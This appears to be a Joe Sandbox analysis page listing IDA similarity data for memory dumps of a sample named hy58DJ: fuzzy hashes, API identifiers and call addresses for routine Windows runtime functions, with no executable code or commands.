                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2395640692-1018135373
                                      • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction ID: 30b82e09e33c88abec56751e42bfe6fa0218b432fd5cb71e155a11368b423caf
                                      • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction Fuzzy Hash: 16519132B19A428ADB14CB16D444A7CB391EB44FA4F9081B2DA4E4776EEF7DF961C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction ID: 14a608cb08d6450631badf2c8110568233adeadac19c13d0854936886947bbf2
                                      • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction Fuzzy Hash: B7619532A08BC581D7609B26E4403BDB7A0FB84BA4F544276EB9C07B69DF7CD1A0CB41
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 3896166516-3733052814
                                      • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction ID: c7b56bb28c75b4f2009f6fa7be42b648bcc16fe8fea5c069f5164e03fcd3ee6b
                                      • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction Fuzzy Hash: B751A232748B428ADB648B23944437C7A90EB54FA5F9441F7DA4D43BAADF7CE460C742
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressHandleLoadModuleProc
                                      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                      • API String ID: 3055805555-3733552308
                                      • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                      • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Process$CurrentSizeWorking
                                      • String ID: Shrinking process size
                                      • API String ID: 2122760700-652428428
                                      • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                      • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Enter$Leave
                                      • String ID:
                                      • API String ID: 2801635615-0
                                      • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                      • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                      • String ID:
                                      • API String ID: 2718003287-0
                                      • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction ID: 6e7fc9e80d4ddd1c41c4c7eed939f477fba48849c8c1c4e704909d664f5b4b1b
                                      • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction Fuzzy Hash: 00D1E372B18A8189E721CF66D4412FC37B1FB44BA8B8042B6DE5D57BA9DF38D526C340
                                      APIs
                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFE1A4CED07), ref: 00007FFE1A4CEE38
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFE1A4CED07), ref: 00007FFE1A4CEEC3
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorLastMode
                                      • String ID:
                                      • API String ID: 953036326-0
                                      • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction ID: afd83536cc1f61d7836c5aa0559d4b6dfc904624459ab29f98e8296eb292d386
                                      • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction Fuzzy Hash: 9291C5B2B18E5295F7709F67944127C2BA0AB04FA8F9441F6DE4E576A9DF3CD452C300
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                      • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                      • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                      • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                      • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                      • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction ID: ce34d0f9bcb6bf2d8f0bcd284f7827bfdd9abd65d0c84f530de47059a6a44696
                                      • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction Fuzzy Hash: 27111C32B15F018AEB008B61E8552B833A4F769B68F440A72DA6D467A4EF78D169C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CreateEvent$CriticalInitializeSection
                                      • String ID:
                                      • API String ID: 926662266-0
                                      • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                      • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: __except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 1467352782-3733052814
                                      • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction ID: 6d9dfd6714d99977a6c2f4f3e8b3415d766628745e0890427d86838c34e09f76
                                      • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction Fuzzy Hash: 91719272708A8186D7608F26944477D7BA0FB44FA8F5481B6EE8C47AADCF3CE561C781
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2558813199-1018135373
                                      • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction ID: 24a6eb08eaa41a383efe67bfb3ef7008bd49ecee1b20ea1fa6d4cc8e50abf946
                                      • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                      • Instruction Fuzzy Hash: 30513E36618B4196D720EF16A04027DB7A4FB89FA0F5011B6DB8D07B69CF38F4A1CB45
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: U
                                      • API String ID: 442123175-4171548499
                                      • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                      • Instruction ID: bdaace7d92299ae9959f2aa4305b7f83bafa1a0df8f7ae5e0131d6021fee6584
                                      • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                      • Instruction Fuzzy Hash: 1641C572B19E8181DB20CF26E4453B96761FB98BA4F804072EE4E877A9EF3CD451CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID: 0eI
                                      • API String ID: 3000768030-3433060948
                                      • Opcode ID: ad76da5c0a2ad7b24dd820ce22a2f6dea1c96ad3649e3b10ed6011db975978b7
                                      • Instruction ID: a0d4dc29db0419737f7d713f1c88f340b36c3faf16a44e22f18b181db431b62a
                                      • Opcode Fuzzy Hash: ad76da5c0a2ad7b24dd820ce22a2f6dea1c96ad3649e3b10ed6011db975978b7
                                      • Instruction Fuzzy Hash: 82318325B18E8291E7608B1694801786650EB45FB0BA803BBD76E473F5CF3DE471D340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID: csm
                                      • API String ID: 3997070919-1018135373
                                      • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                      • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                      • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                      APIs
                                        • Part of subcall function 00007FFE1A4C3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A4C3A63
                                      • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A4D0993
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CheckCommonHandler__except_validate_context_record
                                      • String ID: csm$f
                                      • API String ID: 1543384424-629598281
                                      • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction ID: 6effcd194485b46bae9c67cf69698cce734259e0e3b757ca6b098030996ab0b1
                                      • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                      • Instruction Fuzzy Hash: 2111E432B14B8585E7109F13A04127DA764EB94FE4F4880F6EE8D07B6ACE38E961C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-484248852
                                      • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                      • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                      • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A4C112F), ref: 00007FFE1A4C39E0
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A4C112F), ref: 00007FFE1A4C3A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916099533.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                      • Associated: 00000006.00000002.2916087404.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916115059.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916128873.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2916141066.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe1a4c0000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction ID: 3a4a5732787e7bff694b05738a7d6f4c944c822453834177945c66976f13aa72
                                      • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                      • Instruction Fuzzy Hash: 1B11EC32618F4182EB618B1AF440269B7E5FB98FA4F5842B5EA8D07768DF3CD5618B00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2916032565.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.2916020643.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916061569.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.2916073939.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: TimerWaitable
                                      • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                      • API String ID: 1823812067-3336177065
                                      • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                      • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
